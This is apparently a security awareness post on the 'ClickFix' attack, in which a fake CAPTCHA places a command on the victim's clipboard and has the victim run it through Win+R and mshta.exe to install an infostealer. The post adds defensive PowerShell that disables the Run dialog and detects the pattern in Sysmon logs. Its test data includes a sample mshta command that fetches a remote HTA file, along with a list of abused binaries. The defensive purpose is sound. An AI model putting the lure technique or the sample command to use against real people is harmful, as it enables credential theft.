Here's a simple 3-step trick attackers are using with a high success rate (aka the "ClickFix" attack):
No zero-days. No exploits. Just clever psychological manipulation.
Here's how it works:
Attack Flow:
Attacker sends an email link to the target user, baiting them to take action to "fix" a non-existent issue > User clicks on it > A message appears that asks "Verify you're a human" with the button "I'm not a robot" below.
Victim clicks on "I'm not a robot" > JavaScript in the HTML page triggers the browser to copy a malicious command to the user's clipboard > The attacker now only needs the victim to execute the copied text.
A pop-up window appears asking user to perform 3 simple steps to verify further (refer to pic attached, easy to understand):
- Step 1 says ---> Press the Windows key + R (this opens the Windows "Run" prompt)
- Step 2 says ---> Press the "CTRL" key and the letter "V" at the same time (this pastes the malicious command that the site placed on the clipboard)
- Step 3 says ---> Press the "Enter" key (this causes Windows to execute the command, via mshta.exe, which downloads an infostealer)
The infostealer then accesses credentials, keystrokes and other sensitive information on the victim's system > Exfiltrates the stolen data to the attacker's server!
Key Thoughts:
Deception is the greatest weapon in cybercrime. The best attack is the one where the attacker tricks the victim into executing the attack themselves.
JavaScript cannot directly read clipboard contents without user interaction (for security reasons), but it can write to the clipboard on a button click, which attackers exploit to trick users into pasting malicious commands.
Mshta.exe is a Windows utility that executes Microsoft HTML Application (HTA) files. HTAs are standalone applications that run on the same engine as the browser, but outside of the browser. Because they execute outside the browser, attackers use mshta.exe to sidestep browser security controls such as download warnings and sandboxing!
Attacks such as these are hard to stop because of the human angle involved. But here are some stricter measures you may want to consider:
- Depending on your environment, use GPO or registry settings that restrict execution of PowerShell, mshta.exe and wscript.exe for standard users.
- Windows group policy has an option to prevent Windows from opening the "Run" dialog when users press the Windows key and "R" simultaneously.
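As an added example (not code from the original post), here is the second measure applied with PowerShell: the "Remove Run menu from Start Menu" group policy is backed by the NoRun value under the Explorer policies key, and setting it to 1 also blocks the Win+R shortcut. The function names Set-RunDialogPolicy and Test-RunDialogPolicy are my own; writing to HKLM requires an elevated session, while HKCU affects only the current user.

```powershell
# Added example, not from the original post. Sets the NoRun Explorer policy,
# which is the registry value behind the GPO
# "User Configuration > Administrative Templates > Start Menu and Taskbar >
#  Remove Run menu from Start Menu". NoRun = 1 also disables the Win+R shortcut.

function Set-RunDialogPolicy {
    param(
        [ValidateSet('HKLM', 'HKCU')]
        [string]$Hive = 'HKCU',
        [bool]$Disable = $true
    )
    $path = "${Hive}:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
    if (-not (Test-Path $path)) {
        # The Policies\Explorer key does not exist on a fresh system.
        New-Item -Path $path -Force | Out-Null
    }
    $value = if ($Disable) { 1 } else { 0 }
    New-ItemProperty -Path $path -Name 'NoRun' -Value $value -PropertyType DWord -Force | Out-Null
}

function Test-RunDialogPolicy {
    param(
        [ValidateSet('HKLM', 'HKCU')]
        [string]$Hive = 'HKCU'
    )
    $path = "${Hive}:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
    $item = Get-ItemProperty -Path $path -Name 'NoRun' -ErrorAction SilentlyContinue
    return ($null -ne $item -and $item.NoRun -eq 1)
}

Set-RunDialogPolicy -Hive HKCU -Disable $true
if (Test-RunDialogPolicy -Hive HKCU) {
    "Win+R Run dialog is disabled for the current user."
}
```

The setting is read by Explorer, so a sign-out or an Explorer restart may be needed before Win+R stops working. It removes only the Run dialog; the same pasted command still runs from an open PowerShell or cmd window, which is why the first measure (restricting mshta.exe, wscript.exe and PowerShell for standard users) matters as well.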
With the right endpoint capabilities in place, even if a user makes a mistake, you should still be able to detect and block the infostealer during the download process.
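To make that detection concrete, here is an added example (my own code, not from the original post) that flags the ClickFix execution chain in Sysmon process-creation events: a risky binary such as mshta.exe started by explorer.exe (which is what a Run-dialog launch looks like) with a URL in its command line. The function names, the list of watched binaries and the sample events at the bottom are my assumptions; the samples are constructed for demonstration and are not real telemetry.

```powershell
# Added example, not from the original post. Detects the ClickFix pattern
# (Win+R -> paste -> Enter) in Sysmon Event ID 1 (process creation) records.

# Binaries commonly chosen for the pasted command; extend for your environment.
$SuspiciousChildren = @(
    'mshta.exe', 'powershell.exe', 'pwsh.exe', 'cmd.exe',
    'wscript.exe', 'cscript.exe', 'curl.exe', 'certutil.exe'
)

function Test-ClickFixPattern {
    param(
        [string]$Image,
        [string]$ParentImage,
        [string]$CommandLine
    )
    $child  = [System.IO.Path]::GetFileName($Image).ToLowerInvariant()
    $parent = [System.IO.Path]::GetFileName($ParentImage).ToLowerInvariant()
    # A Run-dialog launch is a direct child of explorer.exe, and the pasted
    # command has to fetch the payload from somewhere, so it carries a URL.
    $fromRunDialog = ($parent -eq 'explorer.exe')
    $riskyBinary   = ($SuspiciousChildren -contains $child)
    $remoteFetch   = ($CommandLine -match '(?i)https?://')
    return ($fromRunDialog -and $riskyBinary -and $remoteFetch)
}

function Get-ClickFixEvents {
    param([int]$MaxEvents = 5000)
    # Sysmon must be installed and logging process creation for this to return data.
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } `
                 -MaxEvents $MaxEvents -ErrorAction Stop |
        ForEach-Object {
            # Read EventData fields by name instead of relying on property positions.
            $xml  = [xml]$_.ToXml()
            $data = @{}
            foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
            if (Test-ClickFixPattern -Image $data['Image'] -ParentImage $data['ParentImage'] -CommandLine $data['CommandLine']) {
                [pscustomobject]@{
                    Time        = $_.TimeCreated
                    User        = $data['User']
                    Image       = $data['Image']
                    CommandLine = $data['CommandLine']
                }
            }
        }
}

# Constructed sample events (not real telemetry) to exercise the rule offline.
$samples = @(
    @{ Image = 'C:\Windows\System32\mshta.exe';    ParentImage = 'C:\Windows\explorer.exe';          CommandLine = 'mshta https://example.invalid/verify.hta' },
    @{ Image = 'C:\Windows\System32\mshta.exe';    ParentImage = 'C:\Program Files\App\setup.exe';   CommandLine = 'mshta C:\Program Files\App\wizard.hta' },
    @{ Image = 'C:\Windows\System32\notepad.exe';  ParentImage = 'C:\Windows\explorer.exe';          CommandLine = 'notepad.exe' }
)
foreach ($s in $samples) {
    '{0} -> {1}' -f $s.CommandLine, (Test-ClickFixPattern @s)
}
```

Only the first sample matches all three conditions. On a live host, Get-ClickFixEvents runs the same test over the Sysmon log; the same logic ports to Security event 4688 if command-line auditing is enabled, and to a SIEM rule keyed on the parent process, child image and command line.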
Run internal phishing tests where users are prompted to copy and paste commands. Teach them: if someone tells you to paste and run something, just do not do it.
This attack teaches a simple lesson: simple, creative tricks can be just as dangerous as advanced exploits.